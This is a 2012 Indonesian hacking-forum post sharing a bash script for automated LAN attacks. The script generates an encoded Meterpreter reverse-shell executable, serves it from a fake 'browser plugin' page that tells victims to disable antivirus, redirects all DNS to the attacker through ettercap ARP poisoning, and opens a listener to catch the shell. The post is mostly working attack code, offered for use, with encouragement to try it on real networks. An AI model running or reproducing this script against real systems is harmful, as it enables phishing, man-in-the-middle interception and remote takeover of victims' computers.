> > > > > >


Scipt Auto Exploit [Ettercap+Dnsspoofing] Metode
gnome_selpa Offline
me@gnomeselpa:~$ whoami
27 - 387
#1
10-31-2012, 10:56 PM
Assalamualaikum kakak-kakak semua... ??
Ane dateng lagi nih ngebikin thread baru, udah ngubek2 kesana kemari ane liat belum ada nih yang ini (kalo repost hapus aja yak).
Ane udah lama banget nyimpen nih script, tapi belum sempet nge-share (maklum belum tau bikin thread) .
sekarang kesempetan bagus buat nge-share ini script, script "bash" yang fungsinya mengexploit windows menggunakan teknik "ettercap + dnsspoofing" (mungkin udah ada yak pake manualnya).

Script ini ane kasih nama dabllink.sh, di karenakan authornya si dabllink. Makanya ane kasih nama itu. Big Grin
ok next ama codingannya :

code:

Code:
#!/bin/bash

#Simple Bypass Firewall ( Easy metasploit + dns spoofing etc )

#Created By Dabllink

#save this file @ root

#Thanks to :

#p0zh1e,SoNz,BeraagaZZS, haryo aka autorun.inf, Syndrom2211, SutuL , Ihsan , all lost-c0de & CBF crew....

#special thanks to : brother Blusp10it & Red-Dragon..

clear

apt-get install figlet

clear

echo "================================================="

figlet Dabllink

echo "================================================="

echo

echo -en "input ip anda : "

read ip

echo

echo -en "input port anda: "

read port

echo

echo "Tunggu , sedang proses (backdooring)....."
msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/nc11gs.exe
clear
panggilmsfcli() {
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$port LHOST=$ip E
}


gnome() {

echo '#!/bin/bash
cetaklagi() {
echo " dns spoofing :)"
echo
echo -en " input interfaces anda : "
read interfaces
echo -en " apa anda sudah punya target ? (y/n) "
read pilihan
if [ $pilihan == "y" ]; then
echo -en " input ip korban : "
read ipkorban
echo -en " input ip gateway : "
read ipgateway
ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
elif [ $pilihan == "n" ]; then
ettercap -Tqi $interfaces -P dns_spoof -M arp // //
else
cetaklagi
fi
exec bash
}
cetaklagi' > /root/spoof.sh
clear
echo "Sedang membuka terminal baru"
sleep 2
chmod +x spoof.sh
gnome-terminal --command="./spoof.sh"
echo "exploit............................................ "
panggilmsfcli
}

kde() {
echo '#!/bin/bash
cetaklagi() {
echo " dns spoofing :)"
echo
echo -en " input interfaces anda : "
read interfaces
echo -en " apa anda sudah punya target ? (y/n) "
read pilihan
if [ $pilihan == "y" ]; then
echo -en " input ip korban : "
read ipkorban
echo -en " input ip gateway : "
read ipgateway
ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
elif [ $pilihan == "n" ]; then
ettercap -Tqi $interfaces -P dns_spoof -M arp // //
else
cetaklagi
fi
exec bash
}
cetaklagi' > /root/spoof.sh
clear
echo "Sedang membuka terminal baru"
sleep 2
chmod +x spoof.sh
konsole --noclose -e ./spoof.sh
echo "exploit............................................ "
panggilmsfcli

}

clear
/etc/init.d/apache2 start
clear

rm /var/www/index.html
echo '<html>
<head>
<title>Browser Plugins !!!</title>
</head>
<body>
<p align="center" class="style2"><u><b>Perhatian! </u></b>install plugins browser anda jika ingin melanjutkan browsing, pastikan tidak ada yang menghambat saat pengunduhan dan penginstalan sedang berjalan <b>seperti antivirus</b></p>
<p align="center">
<input align="center" type="button" name="Button" value="UNDUH SEKARANG" onClick="window.open' >> /var/www/index.html
echo "('/nc11gs.exe','download');" >> /var/www/index.html
echo 'return false;"></p>
</body>
</html>' >> /var/www/index.html
clear
cetak() {
echo "1. /usr/local/share/ettercap/etter.dns"
echo
echo "2. /usr/share/ettercap/etter.dns "
echo
echo -en "Masukan tempat etter.dns anda berada (1/2): "
read pilihan
if [ $pilihan == "1" ]; then
echo "* A $ip" > /usr/local/share/ettercap/etter.dns  
elif [ $pilihan == "2" ]; then
echo "* A $ip" > /usr/share/ettercap/etter.dns
else
clear
cetak
fi
}
cetak
clear


echo -en "Anda menggunakan kde/gnome? "
read pilihanzz
$pilihanzz

#M02X TeaM ..

Save dan simpen di root (save & simpen apa bedanya) dengan nama file dabllink.sh (nama laen juga kagak apa2), tapi authornya jangan diganti yak. Ntar marah lo si dabllink, hehehehe...
lanjutin nih penjelasannya, "kok harus di "root" sih nyimpennya ??
ya karena dnsspoofingya di simpen di "/root/spoof.sh" . juga bisa kok disimpen di directory mana, yang menting spoof.sh tepat nyimpen didirectory mana.

contoh:
ane simpen "dabllink.sh" di directory "/pentest/framework/" , jadi otomatis spoof.sh nya ane edit menjadi "/pentest/framework/spoof.sh".

ok selamat mencoba, Smile
kalo ada virtualbox dicoba deh, kalo nggak ada pake jaringan nyata aja, hehehe.

next alias lanjut Big Grin
eh udah abis nih kayaknya pembahasan kita, ok deh buat temen-temen. Ane siap menerima yang "ijo-ijo" nya hehehehe...


Thank to dabllink (meskipun ane kagak tau orangnya).



Quote:~ Tan Hana Wighna Tan Sirna ~
(This post was last modified: 11-01-2012, 01:24 AM by zee eichel.)  
Website Find
Reply


Messages In This Thread
Scipt Auto Exploit [Ettercap+Dnsspoofing] Metode - by gnome_selpa - 10-31-2012, 10:56 PM




Users browsing this thread: 1 Guest(s)